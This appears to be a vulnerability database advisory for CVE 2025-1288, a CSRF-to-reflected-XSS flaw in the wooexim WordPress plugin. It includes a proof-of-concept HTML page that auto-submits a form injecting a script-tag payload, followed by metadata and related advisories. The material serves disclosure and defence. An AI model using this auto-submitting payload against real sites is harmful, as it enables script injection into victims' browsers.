wooexim <= 5.0.0 – CSRF to Reflected XSS | CVE 2025-1288 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make an unauthenticated user vulnerable to reflected XSS via a CSRF attack.

Proof of Concept

Make someone open the following HTML:

```
<html><body><form action="http://example.com/wp-content/plugins/wooexim/inc/wooexim-import-result.php" method="POST"><input type="hidden" name="custom_field_name" value="</script><script>alert(1)</script><script>" /><input type="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
```

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Hassan Khan Yusufzai - Splint3r7

Submitter

Hassan Khan Yusufzai - Splint3r7

Submitter website

https://hassankhanyusufzai.com

Submitter twitter

Verified

Yes

WPVDB ID

175af35d-6972-42c9-b7ac-913ce1fbac64

Timeline

Publicly Published

2025-01-02 (about 1 year ago)

Added

2025-02-20 (about 10 months ago)

Last Updated

2025-02-20 (about 10 months ago)

Other

Published

Title

Published

2025-10-21

Title

Print Button Shortcode <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2014-08-01

Title

Classic 1.5 - PHP_SELF XSS

Published

2025-01-16

Title

Awesome WordPress Timeline Plugin <= 1.0.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2024-02-02

Title

DearFlip < 2.2.27 - Contributor+ Stored XSS

Published

2024-11-12

Title

NiceJob < 3.7.2 - Contributor+ Stored XSS